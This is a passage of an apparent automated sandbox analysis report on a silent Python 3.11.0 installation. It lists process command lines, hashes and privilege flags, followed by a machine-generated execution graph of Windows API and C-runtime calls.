                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:31
                                                                                                                                Start time:03:10:17
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{BD19B2EA-732D-48C1-8A08-BF4B0C3D44E6} {64FC04EF-7BFE-4576-8BE3-AE2D5EB04A17} 6048
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:34
                                                                                                                                Start time:03:10:30
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{7A5BF652-324E-428D-970C-4BE0E2804237} {336D69AC-00AC-4720-B9AA-68DF04B70AEA} 5768
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:35
                                                                                                                                Start time:03:10:33
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\SrTasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                Imagebase:0x7ff64edc0000
                                                                                                                                File size:59'392 bytes
                                                                                                                                MD5 hash:2694D2D28C368B921686FE567BD319EB
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:36
                                                                                                                                Start time:03:10:33
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:38
                                                                                                                                Start time:03:10:52
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\SrTasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
                                                                                                                                Imagebase:0x7ff64edc0000
                                                                                                                                File size:59'392 bytes
                                                                                                                                MD5 hash:2694D2D28C368B921686FE567BD319EB
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:39
                                                                                                                                Start time:03:10:52
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:42
                                                                                                                                Start time:03:11:38
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BDC2FAFBEB7EA3DA80C7B8E1870EE09C
                                                                                                                                Imagebase:0x880000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:43
                                                                                                                                Start time:03:11:38
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Program Files\Python311\python.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Python311\python.exe" -E -s -m ensurepip -U --default-pip
                                                                                                                                Imagebase:0x7ff6fbf80000
                                                                                                                                File size:101'760 bytes
                                                                                                                                MD5 hash:B7515E4664543B43461C2ECD7A5676DC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:44
                                                                                                                                Start time:03:11:38
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:9.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:14.4%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                  execution_graph 19176 7ff7262b09c0 19187 7ff7262b66f4 19176->19187 19188 7ff7262b6701 19187->19188 19189 7ff7262a9c58 __free_lconv_mon 11 API calls 19188->19189 19191 7ff7262b671d 19188->19191 19189->19188 19190 7ff7262a9c58 __free_lconv_mon 11 API calls 19190->19191 19191->19190 19192 7ff7262b09c9 19191->19192 19193 7ff7262af5e8 EnterCriticalSection 19192->19193 15623 7ff7262a4938 15624 7ff7262a496f 15623->15624 15625 7ff7262a4952 15623->15625 15624->15625 15627 7ff7262a4982 CreateFileW 15624->15627 15674 7ff7262a43d4 15625->15674 15628 7ff7262a49b6 15627->15628 15629 7ff7262a49ec 15627->15629 15648 7ff7262a4a8c GetFileType 15628->15648 15683 7ff7262a4f14 15629->15683 15637 7ff7262a49e1 CloseHandle 15642 7ff7262a496a 15637->15642 15638 7ff7262a49cb CloseHandle 15638->15642 15639 7ff7262a4a20 15709 7ff7262a4cd4 15639->15709 15640 7ff7262a49f5 15704 7ff7262a4368 15640->15704 15647 7ff7262a49ff 15647->15642 15649 7ff7262a4b97 15648->15649 15650 7ff7262a4ada 15648->15650 15651 7ff7262a4b9f 15649->15651 15652 7ff7262a4bc1 15649->15652 15653 7ff7262a4b06 GetFileInformationByHandle 15650->15653 15658 7ff7262a4e10 21 API calls 15650->15658 15654 7ff7262a4bb2 GetLastError 15651->15654 15655 7ff7262a4ba3 15651->15655 15657 7ff7262a4be4 PeekNamedPipe 15652->15657 15663 7ff7262a4b82 15652->15663 15653->15654 15656 7ff7262a4b2f 15653->15656 15662 7ff7262a4368 _fread_nolock 11 API calls 15654->15662 15660 7ff7262a43f4 _get_daylight 11 API calls 15655->15660 15661 7ff7262a4cd4 51 API calls 15656->15661 15657->15663 15659 7ff7262a4af4 15658->15659 15659->15653 15659->15663 15660->15663 15664 7ff7262a4b3a 15661->15664 15662->15663 15733 7ff72629b870 15663->15733 15726 7ff7262a4c34 15664->15726 15669 7ff7262a4c34 10 API calls 15670 7ff7262a4b59 15669->15670 15671 7ff7262a4c34 10 API calls 15670->15671 15672 7ff7262a4b6a 15671->15672 15672->15663 15673 7ff7262a43f4 _get_daylight 11 API calls 15672->15673 15673->15663 15747 7ff7262aa5d8 GetLastError 15674->15747 15676 7ff7262a43dd 15677 7ff7262a43f4 15676->15677 15678 7ff7262aa5d8 _get_daylight 11 API calls 15677->15678 15679 7ff7262a43fd 15678->15679 15680 7ff7262a9bf0 15679->15680 15805 7ff7262a9a88 15680->15805 15682 7ff7262a9c09 15682->15642 15684 7ff7262a4f4a 15683->15684 15685 7ff7262a43f4 _get_daylight 11 API calls 15684->15685 15703 7ff7262a4fe2 __std_exception_copy 15684->15703 15687 7ff7262a4f5c 15685->15687 15686 7ff72629b870 _log10_special 8 API calls 15688 7ff7262a49f1 15686->15688 15689 7ff7262a43f4 _get_daylight 11 API calls 15687->15689 15688->15639 15688->15640 15690 7ff7262a4f64 15689->15690 15857 7ff7262a7118 15690->15857 15692 7ff7262a4f79 15693 7ff7262a4f81 15692->15693 15694 7ff7262a4f8b 15692->15694 15695 7ff7262a43f4 _get_daylight 11 API calls 15693->15695 15696 7ff7262a43f4 _get_daylight 11 API calls 15694->15696 15700 7ff7262a4f86 15695->15700 15697 7ff7262a4f90 15696->15697 15698 7ff7262a43f4 _get_daylight 11 API calls 15697->15698 15697->15703 15699 7ff7262a4f9a 15698->15699 15701 7ff7262a7118 45 API calls 15699->15701 15702 7ff7262a4fd4 GetDriveTypeW 15700->15702 15700->15703 15701->15700 15702->15703 15703->15686 15705 7ff7262aa5d8 _get_daylight 11 API calls 15704->15705 15706 7ff7262a4375 __free_lconv_mon 15705->15706 15707 7ff7262aa5d8 _get_daylight 11 API calls 15706->15707 15708 7ff7262a4397 15707->15708 15708->15647 15710 7ff7262a4cfc 15709->15710 15718 7ff7262a4a2d 15710->15718 15951 7ff7262aea34 15710->15951 15712 7ff7262a4d90 15713 7ff7262aea34 51 API calls 15712->15713 15712->15718 15714 7ff7262a4da3 15713->15714 15715 7ff7262aea34 51 API calls 15714->15715 15714->15718 15716 7ff7262a4db6 15715->15716 15717 7ff7262aea34 51 API calls 15716->15717 15716->15718 15717->15718 15719 7ff7262a4e10 15718->15719 15720 7ff7262a4e2a 15719->15720 15721 7ff7262a4e61 15720->15721 15722 7ff7262a4e3a 15720->15722 15723 7ff7262ae8c8 21 API calls 15721->15723 15724 7ff7262a4368 _fread_nolock 11 API calls 15722->15724 15725 7ff7262a4e4a 15722->15725 15723->15725 15724->15725 15725->15647 15727 7ff7262a4c50 15726->15727 15728 7ff7262a4c5d FileTimeToSystemTime 15726->15728 15727->15728 15729 7ff7262a4c58 15727->15729 15728->15729 15730 7ff7262a4c71 SystemTimeToTzSpecificLocalTime 15728->15730 15731 7ff72629b870 _log10_special 8 API calls 15729->15731 15730->15729 15732 7ff7262a4b49 15731->15732 15732->15669 15734 7ff72629b879 15733->15734 15735 7ff72629b884 15734->15735 15736 7ff72629bc00 IsProcessorFeaturePresent 15734->15736 15735->15637 15735->15638 15737 7ff72629bc18 15736->15737 15742 7ff72629bdf8 RtlCaptureContext 15737->15742 15743 7ff72629be12 RtlLookupFunctionEntry 15742->15743 15744 7ff72629bc2b 15743->15744 15745 7ff72629be28 RtlVirtualUnwind 15743->15745 15746 7ff72629bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15744->15746 15745->15743 15745->15744 15748 7ff7262aa619 FlsSetValue 15747->15748 15753 7ff7262aa5fc 15747->15753 15749 7ff7262aa62b 15748->15749 15761 7ff7262aa609 SetLastError 15748->15761 15764 7ff7262adea8 15749->15764 15753->15748 15753->15761 15754 7ff7262aa658 FlsSetValue 15757 7ff7262aa676 15754->15757 15758 7ff7262aa664 FlsSetValue 15754->15758 15755 7ff7262aa648 FlsSetValue 15756 7ff7262aa651 15755->15756 15771 7ff7262a9c58 15756->15771 15777 7ff7262aa204 15757->15777 15758->15756 15761->15676 15769 7ff7262adeb9 _get_daylight 15764->15769 15765 7ff7262adf0a 15767 7ff7262a43f4 _get_daylight 10 API calls 15765->15767 15766 7ff7262adeee HeapAlloc 15768 7ff7262aa63a 15766->15768 15766->15769 15767->15768 15768->15754 15768->15755 15769->15765 15769->15766 15782 7ff7262b28a0 15769->15782 15772 7ff7262a9c5d RtlFreeHeap 15771->15772 15776 7ff7262a9c8c 15771->15776 15773 7ff7262a9c78 GetLastError 15772->15773 15772->15776 15774 7ff7262a9c85 __free_lconv_mon 15773->15774 15775 7ff7262a43f4 _get_daylight 9 API calls 15774->15775 15775->15776 15776->15761 15791 7ff7262aa0dc 15777->15791 15785 7ff7262b28e0 15782->15785 15790 7ff7262af5e8 EnterCriticalSection 15785->15790 15803 7ff7262af5e8 EnterCriticalSection 15791->15803 15806 7ff7262a9ab3 15805->15806 15809 7ff7262a9b24 15806->15809 15808 7ff7262a9ada 15808->15682 15819 7ff7262a986c 15809->15819 15813 7ff7262a9b5f 15813->15808 15820 7ff7262a98c3 15819->15820 15821 7ff7262a9888 GetLastError 15819->15821 15820->15813 15825 7ff7262a98d8 15820->15825 15822 7ff7262a9898 15821->15822 15832 7ff7262aa6a0 15822->15832 15826 7ff7262a98f4 GetLastError SetLastError 15825->15826 15827 7ff7262a990c 15825->15827 15826->15827 15827->15813 15828 7ff7262a9c10 IsProcessorFeaturePresent 15827->15828 15829 7ff7262a9c23 15828->15829 15849 7ff7262a9924 15829->15849 15833 7ff7262aa6bf FlsGetValue 15832->15833 15834 7ff7262aa6da FlsSetValue 15832->15834 15836 7ff7262aa6d4 15833->15836 15837 7ff7262a98b3 SetLastError 15833->15837 15835 7ff7262aa6e7 15834->15835 15834->15837 15838 7ff7262adea8 _get_daylight 11 API calls 15835->15838 15836->15834 15837->15820 15839 7ff7262aa6f6 15838->15839 15840 7ff7262aa714 FlsSetValue 15839->15840 15841 7ff7262aa704 FlsSetValue 15839->15841 15843 7ff7262aa732 15840->15843 15844 7ff7262aa720 FlsSetValue 15840->15844 15842 7ff7262aa70d 15841->15842 15845 7ff7262a9c58 __free_lconv_mon 11 API calls 15842->15845 15846 7ff7262aa204 _get_daylight 11 API calls 15843->15846 15844->15842 15845->15837 15847 7ff7262aa73a 15846->15847 15848 7ff7262a9c58 __free_lconv_mon 11 API calls 15847->15848 15848->15837 15850 7ff7262a995e _isindst __scrt_get_show_window_mode 15849->15850 15851 7ff7262a9986 RtlCaptureContext RtlLookupFunctionEntry 15850->15851 15852 7ff7262a99c0 RtlVirtualUnwind 15851->15852 15853 7ff7262a99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15851->15853 15852->15853 15854 7ff7262a9a48 _isindst 15853->15854 15855 7ff72629b870 _log10_special 8 API calls 15854->15855 15856 7ff7262a9a67 GetCurrentProcess TerminateProcess 15855->15856 15858 7ff7262a71a2 15857->15858 15859 7ff7262a7134 15857->15859 15894 7ff7262afad0 15858->15894 15859->15858 15861 7ff7262a7139 15859->15861 15862 7ff7262a7151 15861->15862 15863 7ff7262a716e 15861->15863 15869 7ff7262a6ee8 GetFullPathNameW 15862->15869 15877 7ff7262a6f5c GetFullPathNameW 15863->15877 15868 7ff7262a7166 __std_exception_copy 15868->15692 15870 7ff7262a6f0e GetLastError 15869->15870 15874 7ff7262a6f24 15869->15874 15871 7ff7262a4368 _fread_nolock 11 API calls 15870->15871 15872 7ff7262a6f1b 15871->15872 15875 7ff7262a43f4 _get_daylight 11 API calls 15872->15875 15873 7ff7262a6f20 15873->15868 15874->15873 15876 7ff7262a43f4 _get_daylight 11 API calls 15874->15876 15875->15873 15876->15873 15878 7ff7262a6f8f GetLastError 15877->15878 15882 7ff7262a6fa5 __std_exception_copy 15877->15882 15879 7ff7262a4368 _fread_nolock 11 API calls 15878->15879 15880 7ff7262a6f9c 15879->15880 15881 7ff7262a43f4 _get_daylight 11 API calls 15880->15881 15883 7ff7262a6fa1 15881->15883 15882->15883 15884 7ff7262a6fff GetFullPathNameW 15882->15884 15885 7ff7262a7034 15883->15885 15884->15878 15884->15883 15889 7ff7262a70a8 memcpy_s 15885->15889 15890 7ff7262a705d __scrt_get_show_window_mode 15885->15890 15886 7ff7262a7091 15887 7ff7262a43f4 _get_daylight 11 API calls 15886->15887 15888 7ff7262a7096 15887->15888 15892 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 15888->15892 15889->15868 15890->15886 15890->15889 15891 7ff7262a70ca 15890->15891 15891->15889 15893 7ff7262a43f4 _get_daylight 11 API calls 15891->15893 15892->15889 15893->15888 15897 7ff7262af8e0 15894->15897 15898 7ff7262af922 15897->15898 15899 7ff7262af90b 15897->15899 15901 7ff7262af926 15898->15901 15902 7ff7262af947 15898->15902 15900 7ff7262a43f4 _get_daylight 11 API calls 15899->15900 15916 7ff7262af910 15900->15916 15923 7ff7262afa4c 15901->15923 15935 7ff7262ae8c8 15902->15935 15906 7ff7262af92f 15909 7ff7262a43d4 _fread_nolock 11 API calls 15906->15909 15907 7ff7262af94c 15911 7ff7262af9f1 15907->15911 15918 7ff7262af973 15907->15918 15908 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 15922 7ff7262af91b __std_exception_copy 15908->15922 15910 7ff7262af934 15909->15910 15913 7ff7262a43f4 _get_daylight 11 API calls 15910->15913 15911->15899 15914 7ff7262af9f9 15911->15914 15912 7ff72629b870 _log10_special 8 API calls 15915 7ff7262afa41 15912->15915 15913->15916 15917 7ff7262a6ee8 13 API calls 15914->15917 15915->15868 15916->15908 15917->15922 15919 7ff7262a6f5c 14 API calls 15918->15919 15920 7ff7262af9b7 15919->15920 15921 7ff7262a7034 37 API calls 15920->15921 15920->15922 15921->15922 15922->15912 15924 7ff7262afa96 15923->15924 15925 7ff7262afa66 15923->15925 15926 7ff7262afaa1 GetDriveTypeW 15924->15926 15927 7ff7262afa81 15924->15927 15928 7ff7262a43d4 _fread_nolock 11 API calls 15925->15928 15926->15927 15931 7ff72629b870 _log10_special 8 API calls 15927->15931 15929 7ff7262afa6b 15928->15929 15930 7ff7262a43f4 _get_daylight 11 API calls 15929->15930 15932 7ff7262afa76 15930->15932 15933 7ff7262af92b 15931->15933 15934 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 15932->15934 15933->15906 15933->15907 15934->15927 15949 7ff7262b97e0 15935->15949 15937 7ff7262ae8fe GetCurrentDirectoryW 15938 7ff7262ae915 15937->15938 15939 7ff7262ae93c 15937->15939 15942 7ff72629b870 _log10_special 8 API calls 15938->15942 15940 7ff7262adea8 _get_daylight 11 API calls 15939->15940 15941 7ff7262ae94b 15940->15941 15944 7ff7262ae955 GetCurrentDirectoryW 15941->15944 15945 7ff7262ae964 15941->15945 15943 7ff7262ae9a9 15942->15943 15943->15907 15944->15945 15946 7ff7262ae969 15944->15946 15947 7ff7262a43f4 _get_daylight 11 API calls 15945->15947 15948 7ff7262a9c58 __free_lconv_mon 11 API calls 15946->15948 15947->15946 15948->15938 15950 7ff7262b97d0 15949->15950 15950->15937 15950->15950 15952 7ff7262aea41 15951->15952 15953 7ff7262aea65 15951->15953 15952->15953 15954 7ff7262aea46 15952->15954 15956 7ff7262aea9f 15953->15956 15957 7ff7262aeabe 15953->15957 15955 7ff7262a43f4 _get_daylight 11 API calls 15954->15955 15958 7ff7262aea4b 15955->15958 15959 7ff7262a43f4 _get_daylight 11 API calls 15956->15959 15968 7ff7262a4178 15957->15968 15961 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 15958->15961 15962 7ff7262aeaa4 15959->15962 15963 7ff7262aea56 15961->15963 15964 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 15962->15964 15963->15712 15965 7ff7262aeaaf 15964->15965 15965->15712 15966 7ff7262af7ec 51 API calls 15967 7ff7262aeacb 15966->15967 15967->15965 15967->15966 15969 7ff7262a419c 15968->15969 15975 7ff7262a4197 15968->15975 15969->15975 15976 7ff7262aa460 GetLastError 15969->15976 15975->15967 15977 7ff7262aa4a1 FlsSetValue 15976->15977 15978 7ff7262aa484 FlsGetValue 15976->15978 15980 7ff7262aa4b3 15977->15980 15996 7ff7262aa491 15977->15996 15979 7ff7262aa49b 15978->15979 15978->15996 15979->15977 15982 7ff7262adea8 _get_daylight 11 API calls 15980->15982 15981 7ff7262aa50d SetLastError 15983 7ff7262a41b7 15981->15983 15984 7ff7262aa52d 15981->15984 15985 7ff7262aa4c2 15982->15985 15998 7ff7262acc94 15983->15998 16006 7ff7262a9814 15984->16006 15987 7ff7262aa4e0 FlsSetValue 15985->15987 15988 7ff7262aa4d0 FlsSetValue 15985->15988 15989 7ff7262aa4fe 15987->15989 15990 7ff7262aa4ec FlsSetValue 15987->15990 15992 7ff7262aa4d9 15988->15992 15993 7ff7262aa204 _get_daylight 11 API calls 15989->15993 15990->15992 15994 7ff7262a9c58 __free_lconv_mon 11 API calls 15992->15994 15995 7ff7262aa506 15993->15995 15994->15996 15997 7ff7262a9c58 __free_lconv_mon 11 API calls 15995->15997 15996->15981 15997->15981 15999 7ff7262a41da 15998->15999 16000 7ff7262acca9 15998->16000 16002 7ff7262acd00 15999->16002 16000->15999 16050 7ff7262b2614 16000->16050 16003 7ff7262acd15 16002->16003 16004 7ff7262acd28 16002->16004 16003->16004 16063 7ff7262b1960 16003->16063 16004->15975 16015 7ff7262b2960 16006->16015 16041 7ff7262b2918 16015->16041 16046 7ff7262af5e8 EnterCriticalSection 16041->16046 16051 7ff7262aa460 __CxxCallCatchBlock 45 API calls 16050->16051 16052 7ff7262b2623 16051->16052 16053 7ff7262b266e 16052->16053 16062 7ff7262af5e8 EnterCriticalSection 16052->16062 16053->15999 16064 7ff7262aa460 __CxxCallCatchBlock 45 API calls 16063->16064 16065 7ff7262b1969 16064->16065 18637 7ff7262b6f30 18640 7ff7262b1900 18637->18640 18641 7ff7262b1952 18640->18641 18642 7ff7262b190d 18640->18642 18646 7ff7262aa534 18642->18646 18647 7ff7262aa560 FlsSetValue 18646->18647 18648 7ff7262aa545 FlsGetValue 18646->18648 18649 7ff7262aa56d 18647->18649 18650 7ff7262aa552 18647->18650 18648->18650 18651 7ff7262aa55a 18648->18651 18652 7ff7262adea8 _get_daylight 11 API calls 18649->18652 18653 7ff7262aa558 18650->18653 18654 7ff7262a9814 __CxxCallCatchBlock 45 API calls 18650->18654 18651->18647 18656 7ff7262aa57c 18652->18656 18666 7ff7262b15d4 18653->18666 18655 7ff7262aa5d5 18654->18655 18657 7ff7262aa59a FlsSetValue 18656->18657 18658 7ff7262aa58a FlsSetValue 18656->18658 18660 7ff7262aa5a6 FlsSetValue 18657->18660 18661 7ff7262aa5b8 18657->18661 18659 7ff7262aa593 18658->18659 18662 7ff7262a9c58 __free_lconv_mon 11 API calls 18659->18662 18660->18659 18663 7ff7262aa204 _get_daylight 11 API calls 18661->18663 18662->18650 18664 7ff7262aa5c0 18663->18664 18665 7ff7262a9c58 __free_lconv_mon 11 API calls 18664->18665 18665->18653 18689 7ff7262b1844 18666->18689 18668 7ff7262b1609 18704 7ff7262b12d4 18668->18704 18671 7ff7262ac90c _fread_nolock 12 API calls 18672 7ff7262b1637 18671->18672 18673 7ff7262b163f 18672->18673 18675 7ff7262b164e 18672->18675 18674 7ff7262a9c58 __free_lconv_mon 11 API calls 18673->18674 18687 7ff7262b1626 18674->18687 18675->18675 18711 7ff7262b197c 18675->18711 18678 7ff7262b174a 18679 7ff7262a43f4 _get_daylight 11 API calls 18678->18679 18681 7ff7262b174f 18679->18681 18680 7ff7262b17a5 18688 7ff7262b180c 18680->18688 18722 7ff7262b1104 18680->18722 18683 7ff7262a9c58 __free_lconv_mon 11 API calls 18681->18683 18682 7ff7262b1764 18682->18680 18684 7ff7262a9c58 __free_lconv_mon 11 API calls 18682->18684 18683->18687 18684->18680 18686 7ff7262a9c58 __free_lconv_mon 11 API calls 18686->18687 18687->18641 18688->18686 18690 7ff7262b1867 18689->18690 18691 7ff7262b1871 18690->18691 18737 7ff7262af5e8 EnterCriticalSection 18690->18737 18693 7ff7262b18e3 18691->18693 18696 7ff7262a9814 __CxxCallCatchBlock 45 API calls 18691->18696 18693->18668 18698 7ff7262b18fb 18696->18698 18700 7ff7262b1952 18698->18700 18701 7ff7262aa534 50 API calls 18698->18701 18700->18668 18702 7ff7262b193c 18701->18702 18703 7ff7262b15d4 65 API calls 18702->18703 18703->18700 18705 7ff7262a4178 45 API calls 18704->18705 18706 7ff7262b12e8 18705->18706 18707 7ff7262b1306 18706->18707 18708 7ff7262b12f4 GetOEMCP 18706->18708 18709 7ff7262b131b 18707->18709 18710 7ff7262b130b GetACP 18707->18710 18708->18709 18709->18671 18709->18687 18710->18709 18712 7ff7262b12d4 47 API calls 18711->18712 18713 7ff7262b19a9 18712->18713 18714 7ff7262b1aff 18713->18714 18716 7ff7262b19e6 IsValidCodePage 18713->18716 18721 7ff7262b1a00 __scrt_get_show_window_mode 18713->18721 18715 7ff72629b870 _log10_special 8 API calls 18714->18715 18717 7ff7262b1741 18715->18717 18716->18714 18718 7ff7262b19f7 18716->18718 18717->18678 18717->18682 18719 7ff7262b1a26 GetCPInfo 18718->18719 18718->18721 18719->18714 18719->18721 18738 7ff7262b13ec 18721->18738 18804 7ff7262af5e8 EnterCriticalSection 18722->18804 18739 7ff7262b1429 GetCPInfo 18738->18739 18740 7ff7262b151f 18738->18740 18739->18740 18746 7ff7262b143c 18739->18746 18741 7ff72629b870 _log10_special 8 API calls 18740->18741 18742 7ff7262b15be 18741->18742 18742->18714 18743 7ff7262b2150 48 API calls 18744 7ff7262b14b3 18743->18744 18749 7ff7262b6e94 18744->18749 18746->18743 18748 7ff7262b6e94 54 API calls 18748->18740 18750 7ff7262a4178 45 API calls 18749->18750 18751 7ff7262b6eb9 18750->18751 18754 7ff7262b6b60 18751->18754 18755 7ff7262b6ba1 18754->18755 18756 7ff7262aebb0 _fread_nolock MultiByteToWideChar 18755->18756 18761 7ff7262b6beb 18756->18761 18757 7ff7262b6e69 18758 7ff72629b870 _log10_special 8 API calls 18757->18758 18760 7ff7262b14e6 18758->18760 18759 7ff7262b6d21 18759->18757 18764 7ff7262a9c58 __free_lconv_mon 11 API calls 18759->18764 18760->18748 18761->18757 18761->18759 18762 7ff7262ac90c _fread_nolock 12 API calls 18761->18762 18763 7ff7262b6c23 18761->18763 18762->18763 18763->18759 18765 7ff7262aebb0 _fread_nolock MultiByteToWideChar 18763->18765 18764->18757 18766 7ff7262b6c96 18765->18766 18766->18759 18785 7ff7262ae3f4 18766->18785 18769 7ff7262b6ce1 18769->18759 18771 7ff7262ae3f4 __crtLCMapStringW 6 API calls 18769->18771 18770 7ff7262b6d32 18772 7ff7262ac90c _fread_nolock 12 API calls 18770->18772 18773 7ff7262b6e04 18770->18773 18775 7ff7262b6d50 18770->18775 18771->18759 18772->18775 18773->18759 18774 7ff7262a9c58 __free_lconv_mon 11 API calls 18773->18774 18774->18759 18775->18759 18776 7ff7262ae3f4 __crtLCMapStringW 6 API calls 18775->18776 18777 7ff7262b6dd0 18776->18777 18777->18773 18778 7ff7262b6df0 18777->18778 18779 7ff7262b6e06 18777->18779 18780 7ff7262afaf8 WideCharToMultiByte 18778->18780 18781 7ff7262afaf8 WideCharToMultiByte 18779->18781 18782 7ff7262b6dfe 18780->18782 18781->18782 18782->18773 18783 7ff7262b6e1e 18782->18783 18783->18759 18784 7ff7262a9c58 __free_lconv_mon 11 API calls 18783->18784 18784->18759 18791 7ff7262ae020 18785->18791 18789 7ff7262ae4a3 LCMapStringW 18790 7ff7262ae43a 18789->18790 18790->18759 18790->18769 18790->18770 18792 7ff7262ae07d 18791->18792 18793 7ff7262ae078 __vcrt_InitializeCriticalSectionEx 18791->18793 18792->18790 18801 7ff7262ae4e0 18792->18801 18793->18792 18794 7ff7262ae0ad LoadLibraryExW 18793->18794 18795 7ff7262ae1a2 GetProcAddress 18793->18795 18800 7ff7262ae10c LoadLibraryExW 18793->18800 18796 7ff7262ae182 18794->18796 18797 7ff7262ae0d2 GetLastError 18794->18797 18795->18792 18799 7ff7262ae1b3 18795->18799 18796->18795 18798 7ff7262ae199 FreeLibrary 18796->18798 18797->18793 18798->18795 18799->18792 18800->18793 18800->18796 18802 7ff7262ae020 __crtLCMapStringW 5 API calls 18801->18802 18803 7ff7262ae50e 